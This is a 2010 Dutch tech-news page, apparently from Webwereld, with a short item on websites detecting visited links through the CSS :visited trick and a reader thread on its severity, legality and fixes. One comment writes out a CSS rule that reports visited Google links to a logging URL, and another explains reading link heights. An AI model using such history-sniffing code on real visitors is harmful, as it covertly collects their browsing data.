Site kan browsegeschiedenis volledig oogsten

spion

Gepubliceerd: Woensdag 17 maart 2010

De lijst met voorheen bezochte sites in een browser kan nu geautomatiseerd door websites worden geoogst. Deze hack schendt de wet bescherming persoonsgegevens.

Toon volledig artikel

lekz op Woensdag 17 Maart 2010 16:18

image

Lekker vaag...

Komt dit bericht niet 2 weken te vroeg?

M Wegman op Woensdag 17 Maart 2010 16:27

image

2 weken te vroeg? wat ik wel zou willen zien is wat bewijs van deze functie. Toon mij maar is een webpagina die deze check echt doet (in sreen shots oid)

Dit is natuurlijk de mooiste vorm van datamining, google doet dit al tijden door je een extra geschiedenis functie aan te bieden, voor eigen gewin en met toestemming (in de vorm je moet het activeren)

Alex103 op Woensdag 17 Maart 2010 17:04

image

Sorry, hoor, lezen schijnt een kunst te zijn:
Scholten heeft de hack gedemonstreerd aan Webwereld. .

Staat duidelijk in de tekst.

M Wegman op Woensdag 17 Maart 2010 20:11

image

Mag iemand niet om een toelichting in de vorm van afbeeldingen vragen en daar bij direct beschuldigd worden van slecht lezen.

Alex103 op Donderdag 18 Maart 2010 16:32

image

Natuurlijk mag dat, het gat echter om wat ik wel zou willen zien is wat bewijs van deze functie. Toon mij maar is een webpagina die deze check echt doet .

Het is aan Webwereld getoond, ik ga er van uit dat Webwereld niet ligt, en dus is het bewijs geleverd dat het kan. En dus niet goed gelezen.

ikstemtegen op Vrijdag 19 Maart 2010 19:29

image

De link in het artikel toont het ook aan. Welliswaar probeert het of je microsoft.com bezocht hebt, en kan alleen maar zien of dat zo is. Het haalt dus niet je browsergeschiedenis op maar gokt en controleert. De exacte url blijft onzichtbaar (tenzij je goed gokt)

realbart op Dinsdag 7 December 2010 10:54

image

Als je eenmaal een pagina goed gegokt hebt, kan je kijken welke links er op die pagina staan, en van links deze op dezelfde wijze achterhalen of ze ooit gevolgd zijn. Het is niet vreselijk eenvoudig, maar zo is wel het klikpad door sites als wikipedia en/of marktplaats te achterhalen.

Als je eenmaal een interessegebied hebt gevonden, kan je door het proberen van gerelateerde links ook gokken. Als je bijvoorbeeld op bol.com bent geweest, probeer dan ook amazon. Komt iemand op marktplaats, probeer dan ook die-andere-tweedehands-site.

Anonymous Coward op Woensdag 17 Maart 2010 18:29

image

Google heeft sowieso Analytics al om het bezoekgedrag van zowat het halve internet te kunnen volgen. "Jij" denkt dat alleen jouw site gemeten wordt, maar bij Google op kantoor kunnen ze enorme dwarsdoorsnedes van het internet maken. Geen wonder dat het gebruik "gratis" is!

linus4ever op Woensdag 17 Maart 2010 19:04

image

Helemaal mee eens, ik snap jouw minnaars ook niet.

Voor welke platforms met versies en browsers met versies geldt deze kwetsbaarheid?

ikstemtegen op Vrijdag 19 Maart 2010 19:31

image

Alle. Het komt door een feature van de browser. Nl hij laat weten of een link al bezocht is en roept daarvoor een gedeelte uit je stylesheet aan. Dat kun je loggen. m.a.w. je voert de browser links en hij laat weten of jij er bent geweest.

Kun je ook niet uitzetten.

anonymous_118315 op Vrijdag 19 Maart 2010 22:15

image

Kun je ook niet uitzetten.In (in elk geval) Firefox wel. Ik heb de methode hier gepost. Ook naar andere trucs die het 'lek' gedeeltelijk kunnen dichten heb ik hier gelinkt.

leen op Woensdag 17 Maart 2010 16:25

image

Kan me hier we iets bij voorstellen. Je geeft bijvoorbeeld 'a:visited' een display:block met specifieke hoogte, en leest vervolgens van alle links de hoogte uit.

crisp op Woensdag 17 Maart 2010 16:32

image

Deze 'brute-force' hack is al minstens 8 jaar bekend: https://bugzilla.mozilla.org/show_bug.cgi?id=147777

a1051785 op Woensdag 17 Maart 2010 16:37

image

Een bewijs?

www.whattheinternetknowsaboutyou.com

cjkos op Woensdag 17 Maart 2010 17:07

image

Laat me raden, ik moet eerst javascript toestaan? De pagina is al een 30 minuten aan het laden!

Eric_ op Woensdag 17 Maart 2010 18:14

image

inderdaad, maar bij mij kwam een timeout en de volgende melding:


Congratulations, we did not find anything in this category in your browser history.
Feel free to try our other browser history tests.

anonymous_118315 op Woensdag 17 Maart 2010 19:58

image

Met het uitschakelen van javascript ben je er niet. Dan werkt alleen het specifieke testscript van de testsite niet.

Voor (deel)oplossingen kan je hier terecht.

anonymous_118315 op Woensdag 17 Maart 2010 21:29

image

-2 / 2Tssk, mijn fans houden er zo te zien niet van als ik een link naar oplossingen geef. Marketeers waarschijnlijk? :D

ozzybulldog op Donderdag 18 Maart 2010 12:48

image

Ik wel, Bedankt.

Oz

Bladerunner op Donderdag 18 Maart 2010 23:17

image

Heb jij fans dan? (Ik dacht dat je inmiddels je schoenen weer aan had?)

grapje...

Gregorius op Donderdag 18 Maart 2010 08:53

image

Bedankt voor deze zeer nuttige informatie/link.

Eric_ op Donderdag 18 Maart 2010 12:44

image

Bedankt Peter, daar stond nog een tip tussen die ik kon gebruiken.

M Wegman op Woensdag 17 Maart 2010 20:13

image

een bewijs

Dank u :)

basvd op Woensdag 17 Maart 2010 16:38

image zomerhack badge 2

Met de komst van CSS2/3 kan dit toch iedereen?!?
a:visited[href^="http://www.google.nl"] {
display:none;
background-image: url(http://statistieken/log/google)
}

En anders is dit eenvoudig via javascript uit te lezen. Weinig nieuwswaarde dus.

uranis op Woensdag 17 Maart 2010 17:47

image

ja dat dacht ik ook.. beetje raar.. de meeste webkits hebben die functie gewoon er in zitten..

Andre Scholten op Woensdag 17 Maart 2010 16:42

image

Het gaat mij ook niet zozeer om de technische insteek, maar meer om het feit dat het grote publiek niet weet dat iedereen dit heel makkelijk kan achterhalen. Waarom doen browsers hier niets aan?

Lennart op Woensdag 17 Maart 2010 16:48

image zomerhack badge 3

Omdat er niet zo heel veel tegen te doen is... behalve dat hele a:visited verhaal uit de CSS specs slopen.

Het is ook minder erg dan de kop doet vermoeden; het is niet mogelijk om de hele history te oogsten, je kan alleen van een url checken of deze is bezocht of niet. Zoals in het artikel zelf staat dus.

bvermolen op Woensdag 17 Maart 2010 16:49

image

De enige manier om deze "hack" te laten werken is een enorme berg met links op je pagina te zetten. En dan niet alleen de domeinnaam, maar ook alle subpagina's.

Dus je kan alleen de links uitlezen die je zelf op de pagina hebt neergezet en je krijgt echt niet een lijstje met laatste bezochte urls binnen.

crisp op Woensdag 17 Maart 2010 16:52

image

Zie onder andere het door mij aangehaalde bugzilla ticket; browsers zijn hier wel mee bezig, maar misschien niet (duidelijk) genoeg. Firefox heeft iig een layout.css.visited_links_enabled setting, en de meeste browsers hebben ook een 'privacy' mode waar deze hack volgens mij ook niet werkt (of in ieder geval niet hoort te werken).

Ik denk dat uiteindelijk de gebruiker de keuze zelf zou moeten maken tussen gebruiksvriendelijkheid en veiligheid door middel van (makkelijk bereikbare - daar schort de setting van Firefox al te kort) opties. Je zou in ieder geval een optie kunnen bieden om dit gedrag helemaal uit te schakelen, een optie om alleen visited links binnen het huidige domein te markeren, en/of een whitelist van domeinen die je genoeg vertrouwd om wel alle visited links te markeren. Vooral voor het overzicht van zoekresultaten van een searchengine is dit toch een hele waardevolle feature.

Bart__ op Woensdag 17 Maart 2010 17:13

image

Wat een misleidende kop. Uit het bericht concludeer ik dat je blijkbaar alleen kunt zien of iemand wel of niet een link bezocht heeft. Op zich ook een kwalijke zaak, maar een stuk minder ernstig dan de kop doet vermoeden.
De enige manier om zo een volledige lijst van de browsergeschiedenis te verkrijgen is als je eerst al een volledige lijst van ALLE urls van het hele web genereert. Ik hoef vast niet uit te leggen dat dat in de praktijk een tijdrovende klus gaat worden.

Andreas Udo de Haes op Woensdag 17 Maart 2010 17:23

image

Als deze functionaliteit gekoppeld is aan een flinke database van url's (zoals Alexa of zo) dan kom je al gauw aan een behoorlijk volledige browsegeschiedenis van een bezoeker. Zie bijv www.whattheinternetknowsaboutyou.com, zoals bovenin deze thread werd geopperd.

Lennart op Woensdag 17 Maart 2010 20:22

image zomerhack badge 3

Wel jammer dat ze webwereld nog niet kennen daar...

23JUL op Woensdag 17 Maart 2010 17:57

image

.. het woord "volledig" is tegenwoordig dus ook al aan inflatie onderhevig..

Marc Verkerk op Woensdag 17 Maart 2010 17:58

image

Voor IT-ers is deze kennis misschien niet nieuw, maar voor (Online) marketeers misschien wel. Zij kunnen bijvoorbeeld deze informatie inzetten om te kijken welke pagina's voor hun het lukratiefst zijn om op te adverteren. De discussie die echter gesteld moet worden is of deze gegevens verzameling wel toegestaan moet zijn....

zwart-wit op Woensdag 17 Maart 2010 18:13

image

Volgens ict-jurist Arnoud Engelfriet is deze hack zonder twijfel illegaal. "Je mag gegevens gebruiken die een klant aanlevert, maar daarvoor moet die expliciet of impliciet toestemming hebben gegeven." Dat geldt bijvoorbeeld voor de user agent of cookies. "Maar dit is absoluut niet te vergelijken met browserversie tracken of cookies zetten."

Discussie is toch niet nodig? Het antwoord wordt toch echt al gegeven in het artikel.

Heb je het artikel van Andreas wel helemaal gelezen?

Anonymous Coward op Woensdag 17 Maart 2010 19:23

image

Dit lijkt me vooral aan de browserzijde een fiks gat van jewelste.
Niet nieuw maar daarom niet minder erg.

Welke browsers er allemaal gevoelig voor zijn?

IE: Congratulations, we did not find anything in this category in your browser history.Feel free to try our other browser history tests.

FF: volledige geschiedenis getoond.

moet de rest nog testen beide onder W7,64bit

Is niet best dit.. een browser moet je privacy beschermen.

Yrcimim op Woensdag 17 Maart 2010 19:31

image

Je gebruikt Firefox en nooit IE blijkbaar... ;-/

Anonymous Coward op Woensdag 17 Maart 2010 19:41

image

ik gebruik inderdaad FF maar wel degelijk soms IE dus het is hier IE die het tegen weet te houden en firefox die wagenwijd alles bloot geeft. mm, wat ongelukkig geformuleerd ;)

anonymous_118315 op Woensdag 17 Maart 2010 19:55

image

De site test volgens mij tegen een aantal populaire sites. Het test of een link aan de :visited css tag wordt gekoppeld. Dus als je versie van IE een andere kleur geeft aan bezochte links ben je al kwetsbaar. Maar als jij liever gelooft dat IE veilig is en Firefox niet. Ga je gang.

anonymous_118315 op Woensdag 17 Maart 2010 20:42

image

Ik heb het even snel getest (de desktop stond toch aan)

Eerst heb ik bezocht:
www.garfield.com/
www.leasticoulddo.com/ (De comic van 17-3 zal je wel aanspreken)

En daarna:
www.whattheinte...wsaboutyou.com/

En beide werden 'netjes' getoond in IE8. ;)

Anonymous Coward op Woensdag 17 Maart 2010 21:06

image

klopt hier ook.. blijkbaar weinig sites bezocht uit de lijst.
De flauwe grapjes site geeft ook een ander thumb dan het origineel./ dat is dus vooral cosmetisch van aard.
Dus nog een browser die hoognodig zijn privacysettings moet aanpassen. Dat maakt het er niet bete rop!

anonymous_118315 op Woensdag 17 Maart 2010 21:23

image

Het achterhalen van alle sites waar de gebruiker geweest is, is redelijk bewerkelijk, dus ik verwacht persoonlijk niet dat dit op korte termijn tot grote problemen gaat leiden.

Ik heb verder wel voor alle zekerheid de truc voor Firefox doorgevoerd. Als meer mensen dat doen, dan loopt dit denk ik wel met een sisser af.

CyberData op Donderdag 18 Maart 2010 08:54

image

Best wel spooky. In FF vindt ie helemaal niets in IE8 lepelt hij zo mijn favoriete sites op..... voor zover ik die favoriet noem maar och.

Hoe kun je dit nu in ie8 voorkomen?

Gregorius op Donderdag 18 Maart 2010 09:06

image

Hoe kun je dit nu in ie8 voorkomen?

Waarom zou je, voor normaal gebruik, uberhaupt IE willen gebruiken??

Chilli op Donderdag 18 Maart 2010 15:51

image

IE gebruikt 2-3x minder geheugen en start 20x sneller op in Windows.... ?

anonymous_118315 op Woensdag 17 Maart 2010 19:51

image

Voor Firefox is er een heel eenvoudige oplossing:
Firefox 3.5 users will be happy to learn that their browser has a configuration option which disables visited links. To enable it, type in about:config in the address bar and set the layout.css.visited_links_enabled option to False.Wel apart dat het bij jouw in IE niet werkte. Waarschijnlijk is je historie leeg omdat je een Firefox gebruiker bent.

CyberData op Woensdag 17 Maart 2010 20:02

image

Thanks weer leuk ontdekt die oplossing voor ff


Maar bedoelde je niet:

Firefox 3.5 users will be happy to learn that their browser has a configuration option which disables visited links. To DISABLE it, type in about:config in the address bar and set the layout.css.visited_links_enabled option to False.

anonymous_118315 op Woensdag 17 Maart 2010 20:08

image

Volgens mij enable je de configuratie optie 'which disables visited links'. Maar misschien had de site het anders (helderder) kunnen formuleren.

Jachra op Donderdag 18 Maart 2010 02:22

image

Het verbaasd mij ten zeerste dat bij Mozilla veiligheid de boven toon voert, maar dat men deze optie niet default aanzet?

anonymous_118315 op Donderdag 18 Maart 2010 08:54

image

Ik denk dat daar 2 redenen voor zijn. Het achterhalen van je browsergeschiedenis is meer gokwerk, dus misbruik is nog niet zo gemakkelijk als dat het lijkt. En de klachten dat mensen niet meer kunnen zien welke links ze op de pagina al gezien hebben zouden waarschijnlijk te groot zijn.

Wat ze wat mij betreft wel zouden kunnen doen, is hier iets prominenter aandacht aan besteden.

Jachra op Donderdag 18 Maart 2010 11:06

image

Inderdaad. Ze zouden op zijn minst dit kunnen meenemen in het installatie-programma.

starting killall op Zaterdag 20 Maart 2010 12:39

image

Het is weliswaar gokken, maar je kan ook intelligent gokken en bijvoorbeeld beginnen met de 20 populairste pornosites.
Het achterhalen van je browsergeschiedenis is meer gokwerk, dus misbruik is nog niet zo gemakkelijk als dat het lijkt. En de klachten dat mensen niet meer kunnen zien welke links ze op de pagina al gezien hebben zouden waarschijnlijk te groot zijn.

Leest mw. peter deze site ook?
Dat vergeten mensen altijd als t gaat om veiligheid. Vreest uw vrienden!
(geldt ook zo voor de chipkaart)

zwart-wit op Woensdag 17 Maart 2010 21:04

image

Moet je natuurlijk even verder door lezen Peter

However, note that this workardound does not protect you from having your history detected using the pure CSS method; therefore, it can only make history detection slightly slower and doesn't really solve the problem.

Er is op dit moment dus absoluut geen browser veilig voor dit 'history detection' probleem

anonymous_118315 op Woensdag 17 Maart 2010 21:19

image

Dat slaat op een andere truc. :)
Also, as a partial solution, in some browsers (including, the most popular ones: Firefox and Internet Explorer), you can override the default way to show visited links. In principle, this should protect you from having your history detected with Javascript;De setting in Firefox schakelt de css:visited tag helemaal uit. Dus hoe je het dan via pure css nog wil achterhalen vraag ik me af.

ozzybulldog op Donderdag 18 Maart 2010 12:50

image

En ook hier bedankt, werkt perfect.

Oz

watdra op Woensdag 17 Maart 2010 20:08

image

Ik gooi mijn browsergeschiedenis meerdere malen per dag weg. Om die reden geef ik de voorkeur aan Firefox boven Chrome. Bij Chrome zit de knop om alles weg te gooien te ver weg, dat private browsing maakt je maar verdacht bij je naasten.

JanW op Woensdag 17 Maart 2010 20:35

image

dat private browsing maakt je maar verdacht bij je naasten.
Toon je naasten dit artikel. Maakt je misschien wat minder verdacht als je weer eens van private browsing gebruik wil maken. :-)

batlequeen op Woensdag 17 Maart 2010 22:38

image

Hmmmm gezien er in het algemeen JS nodig is zit ik met FF + noscript dus safe

javascript laat ik bijna nooit toe

mpm op Dinsdag 23 Maart 2010 22:57

image

Nope... Via CSS lekt u nog steeds, ook als u Javascript geheel van uw PC zou verwijderen.

Schavuit op Donderdag 18 Maart 2010 06:23

image

Ik zet mijn history al jaren standaard uit bij het installeren van een browser en ik heb nog nooit gedacht: "Ja, nu was het wel fijn geweest als ik mijn history had bijgehouden".
Het zal er best zijn, maar ik heb het nut er nog nooit van gevonden.

kmg454 op Donderdag 18 Maart 2010 09:13

image

Wat een paranoia hier, het zou mij een worst wezen of iemand kan zien welke sites ik heb bezocht.

Er staan misschien wel meer dan 1000 websites in mijn historie en de site www.whattheinternetknowsaboutyou.com toont er maar 4

Je kan natuurlijk van een mug een olifant maken.

MasterMek op Donderdag 18 Maart 2010 09:41

image

Mmmm...
'Scholten wil hiermee vooral waarschuwen voor het fenomeen en geeft de code dan ook niet vrij, vertelt hij. "Bijna niemand kent deze truc. De meeste internetgebruikers weten hier niks van.'
Bedankt Scholten! Nu kent iedereen de truc en iedereen kan 'm ook nog eens gebruiken door je javascripje te knippen en te plakken. Lekker slim, lekker veilig.

spatieman op Donderdag 18 Maart 2010 17:50

image

site doet het niet..
Maar voor welke browser is dat?
IE zeker weer ? xD (IE8 is veilig volgens WC eend MS)

h4f op Vrijdag 19 Maart 2010 03:48

image

Deze hack schendt de wet bescherming persoonsgegevens.

Sinds wanneer is enige handeling die op een computer plaatsvind zonder expliciete toestemming van de rechtmatige eigenaar, die ook niet ten bate van de eigenaar kan zijn, rechtmatig ?

De term hack in meest gebruikte context als ook in deze context slaat erop dat iemand een iets exploiteert en daarmee al een onrechtmatige handeling doet zoals in wet computercriminaliteit II is gedefinieerd. Dat is strafrecht dus iemand kan de cel in......

Echter voor schending van privacy gaat niemand de cel in.

Om te kunnen reageren, dient u ingelogd te zijn.

Nieuwsbrief

Ontvang dagelijks een overzicht van het laatste ICT-Nieuws in uw mailbox

Peiling

Loading Poll

Video: World Tech Update: Darpa's robot oorl...

World Tech Update: Darpa's robot oorlogspaard (video)

Verleden nieuws